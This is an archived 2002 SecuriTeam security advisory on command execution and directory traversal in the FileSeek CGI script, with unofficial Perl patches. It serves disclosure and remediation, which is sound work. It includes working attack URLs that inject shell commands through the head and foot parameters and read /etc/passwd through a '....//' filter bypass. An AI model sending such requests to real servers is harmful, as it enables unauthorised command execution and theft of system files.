[UNIX] FileSeek CGI Script Command Execution and Arbitrary File Viewing Vulnerabilities

From: support@securiteam.com
Date: 04/17/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 17 Apr 2002 14:42:11 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  FileSeek CGI Script Command Execution and Arbitrary File Viewing
Vulnerabilities
------------------------------------------------------------------------

SUMMARY

 <http://www.cgi-perl.com/programs/FileSeek/> FileSeek is a simple search
program that allows visitors to a site to look at the contents of file
directories and to search through those directories for filenames matching
a specified text string. Unlike the program states, it is possible to view
the content of files you would not have allowed viewing, for example
/etc/passwd, by simply including a traversal string inside the provided
parameters.

DETAILS

There are two vulnerabilities in the script:
 * The first is that the script does not filter escape characters allowing
executing of arbitrary commands.
 * The second vulnerability is a directory transversal bug that would let
you read any file on the server. This because of the script filtering
"../" out of the request, which can be bypassed if the request uses
"....//" which after filtering "../" out of it leaves "../" .

Command execution vulnerability:
http://host/cgi-bin/FileSeek.cgi?head=&foot=;id|
http://host/cgi-bin/FileSeek.cgi?head=;id|&foot=

http://host/cgi-bin/FileSeek.cgi?head=&foot=|id|
http://host/cgi-bin/FileSeek.cgi?head=|id|&foot=

Directory transversal vulnerability:
http://host/cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
http://host/cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=

Unofficial patch:
Patch for Command execution vulnerability:

Add below the "Generate HTML page" part the following code:
####################################################################

   # Generate the HTML page #

####################################################################

   $ARGS{'head'} =~ tr/\|\;/XX/;
   $ARGS{'foot'} =~ tr/\|\;/XX/;

This will make the request bogus if it contains a ; or |, so that it will
result in an error.

Patch for Directory transversal vulnerability:
Change the following Part:

   # Make sure they're not trying to access an invalid directory

   if ($directory =~ /$DD\.\./) { $directory = '' }
   $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;
   $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;

Into:

   # Make sure they're not trying to access an invalid directory

   if ($directory =~ /$DD\.\./) { $directory = '' }
   $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;
   $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;

This will make it filter on ".." and not on "../"

ADDITIONAL INFORMATION

The information has been provided by
<mailto:nighthawk@hackers4hackers.org> Thijs Bosschert.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [EXPL] Remote Heap malloc/free and Multiple Overflow Vulnerability in WSMP3 (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WsMp3 versions ... # Remote Heap malloc/free & multiple Overflow vulnerability in WSMP3. ... to $Host \n"; ...
    (Securiteam)
  • [EXPL] Off-by-One Error in realpath() (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... vulnerability in order to gain shell access. ... #realpath lukemftpd remote exploit for freeBSD 4.8 ...
    (Securiteam)
  • [UNIX] DSH HOME Environment Buffer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get Thawte's New Step-by-Step SSL Guide for MSIIS ... This vulnerability will allow attackers to cause the product crash. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Owl Intranet Engine Security Bypassing
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Owl is a multi user document repository ... A vulnerability in the product allows remote attackers to ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] RSA ClearTrust Cross Site Scripting Issues
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The RSA ClearTrust is a Web access ... A cross-site scripting vulnerability in the product allows an attacker to ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)